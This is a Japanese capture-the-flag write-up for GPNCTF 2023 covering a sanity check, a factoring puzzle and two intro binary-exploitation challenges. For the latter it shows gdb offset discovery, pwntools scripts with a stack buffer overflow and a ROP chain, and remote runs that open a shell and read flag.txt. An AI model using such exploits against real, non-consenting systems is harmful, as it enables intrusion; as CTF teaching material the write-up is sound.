この大会は2023/6/9 19:00(JST)~2023/6/11 7:00(JST)に開催されました。
今回もチームで参戦。結果は400点で442チーム中108位でした。
自分で解けた問題をWriteupとして書いておきます。
sanitiy check (misc)
Discordに入り、#rulesチャネルのメッセージを見ると、フラグが書いてあった。
GPNCTF{w3lc0m3_70_6pnc7f_2023_2f41b7e84a02939e}
Overflow in the fl4gtory (intro)
BOFでshutoff関数をコールする。
$ gdb -q ./overflow-in-the-fl4gtory Reading symbols from ./overflow-in-the-fl4gtory... (No debugging symbols found in ./overflow-in-the-fl4gtory) gdb-peda$ pattc 300 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%' gdb-peda$ r Starting program: /media/sf_Shared/overflow-in-the-fl4gtory [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A% AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A% Program received signal SIGSEGV, Segmentation fault. Warning: 'set logging off', an alias for the command 'set logging enabled', is deprecated. Use 'set logging enabled off'. Warning: 'set logging on', an alias for the command 'set logging enabled', is deprecated. Use 'set logging enabled on'. [----------------------------------registers-----------------------------------] RAX: 0x0 RBX: 0x7fffffffdec8 --> 0x7fffffffe23f ("/media/sf_Shared/overflow-in-the-fl4gtory") RCX: 0x7ffff7ec00e0 (<__GI___libc_write+16>: cmp rax,0xfffffffffffff000) RDX: 0x1 RSI: 0x1 RDI: 0x7ffff7f9ca10 --> 0x0 RBP: 0x2541322541632541 ('A%cA%2A%') RSP: 0x7fffffffddb8 ("HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%") RIP: 0x4011b8 (<main+52>: ret) R8 : 0x4053cd --> 0x0 R9 : 0x0 R10: 0x1000 R11: 0x202 R12: 0x0 R13: 0x7fffffffded8 --> 0x7fffffffe269 ("CLUTTER_IM_MODULE=xim") R14: 0x403df0 --> 0x401110 (endbr64) R15: 0x7ffff7ffd020 --> 0x7ffff7ffe2e0 --> 0x0 EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x4011ad <main+41>: call 0x401030 <puts@plt> 0x4011b2 <main+46>: mov eax,0x0 0x4011b7 <main+51>: leave => 0x4011b8 <main+52>: ret 0x4011b9: add BYTE PTR [rax],al 0x4011bb: add bl,dh 0x4011bd <_fini+1>: nop edx 0x4011c0 <_fini+4>: sub rsp,0x8 [------------------------------------stack-------------------------------------] 0000| 0x7fffffffddb8 ("HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%") 0008| 0x7fffffffddc0 ("%IA%eA%4A%JA%fA%5A%KA%gA%6A%") 0016| 0x7fffffffddc8 ("A%JA%fA%5A%KA%gA%6A%") 0024| 0x7fffffffddd0 ("5A%KA%gA%6A%") 0032| 0x7fffffffddd8 --> 0x7f0025413625 0040| 0x7fffffffdde0 --> 0x7fffffffdec8 --> 0x7fffffffe23f ("/media/sf_Shared/overflow-in-the-fl4gtory") 0048| 0x7fffffffdde8 --> 0x4be8a50619ff2784 0056| 0x7fffffffddf0 --> 0x0 [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGSEGV 0x00000000004011b8 in main () gdb-peda$ patto HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A% HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A% found at offset: 264
任意の264バイトの後にshutoff関数のアドレスを入力すればよい。
#!/usr/bin/env python3 from pwn import * if args.DEBUG: p = gdb.debug("./overflow-in-the-fl4gtory") elif args.REMOTE: p = remote('overflow-in-the-fl4gtory-0.chals.kitctf.de', 1337, ssl=True) else: p = process("./overflow-in-the-fl4gtory") elf = ELF('./overflow-in-the-fl4gtory') shutoff_addr = elf.symbols['shutoff'] payload = b'A' * 264 payload += p64(shutoff_addr) print(payload) p.sendline(payload) data = p.recvline().rstrip() print(data) p.interactive()
実行結果は以下の通り。
[+] Opening connection to overflow-in-the-fl4gtory-0.chals.kitctf.de on port 1337: Done [*] '/media/sf_Shared/overflow-in-the-fl4gtory' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAF\x11@\x00\x00\x00\x00\x00' b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAF\x11@' [*] Switching to interactive mode Pipe shut off! Congrats! You've solved (or exploited) the overflow! Get your flag: $ ls flag.txt overflow-in-the-fl4gtory $ cat flag.txt GPNCTF{M0re_0verf0ws_ar3_c0ming_:O}
GPNCTF{M0re_0verf0ws_ar3_c0ming_:O}
Overlows keep flowing (intro)
BOFで引数に0xdeadbeefd3adc0deを渡し、shutoff関数をコールできればよい。
$ ROPgadget --binary overflows-keep-flowing --re "pop rdi" Gadgets information ============================================================ 0x00000000004012b3 : pop rdi ; ret Unique gadgets found: 1 $ ROPgadget --binary overflows-keep-flowing | grep ": ret" 0x000000000040101a : ret
#!/usr/bin/env python3 from pwn import * if args.GDB: p = gdb.debug("./overflows-keep-flowing") elif args.REMOTE: p = remote('overflows-keep-flowing-0.chals.kitctf.de', 1337, ssl=True) else: p = process("./overflows-keep-flowing") elf = ELF('./overflows-keep-flowing') shutoff_addr = elf.symbols['shutoff'] pop_rdi = 0x4012b3 ret_addr = 0x40101a payload = b'A' * 264 payload += p64(pop_rdi) payload += p64(0xdeadbeefd3adc0de) payload += p64(ret_addr) payload += p64(shutoff_addr) print(payload) p.sendline(payload) data = p.recvline().rstrip() print(data) p.interactive()
実行結果は以下の通り。
[+] Opening connection to overflows-keep-flowing-0.chals.kitctf.de on port 1337: Done [*] '/media/sf_Shared/overflows-keep-flowing' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xb3\x12@\x00\x00\x00\x00\x00\xde\xc0\xad\xd3\xef\xbe\xad\xde\x1a\x10@\x00\x00\x00\x00\x00\xb6\x11@\x00\x00\x00\x00\x00' b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xb3\x12@' [*] Switching to interactive mode Phew. Another accident prevented. Shutting off -2401053089060765474 $ ls flag.txt overflows-keep-flowing $ cat flag.txt GPNCTF{1_h0p3_y0u_d1dn't_actually_bu1ld_a_r0p_cha1n}
GPNCTF{1_h0p3_y0u_d1dn't_actually_bu1ld_a_r0p_cha1n}
ref4ctory (crypto)
factorsの値で1を除く整数の積に分解できれば良い。factordbで素因数分解してみる。
4 = 2 * 2 10 = 2 * 5 0x123120 = 1192224 = 2^5 * 3 * 11 * 1129 = 1056 * 1129 38201373467 = 111871 * 341477 247867822373 = 268817 * 922069 422943922809193529087 = 458843971 * 921759790997 3741 = 3 * 29 * 43 = 43 * 87
あとはこの数値を入力していく。
$ ncat --ssl ref4ctory-0.chals.kitctf.de 1337 Factor 4 a:2 2 b:2 2 Factor 10 a:2 2 b:5 5 Factor 1192224 a:1056 1056 b:1129 1129 Factor 38201373467 a:111871 111871 b:341477 341477 Factor 247867822373 a:268817 268817 b:922069 922069 Factor 422943922809193529087 a:458843971 458843971 b:921759790997 921759790997 Factor 3741 a:43 43 b:87 87 Here is your Flag. Good Job! GPNCTF{Gaussian_Integers_n33d_Gaussian_Primes}
GPNCTF{Gaussian_Integers_n33d_Gaussian_Primes}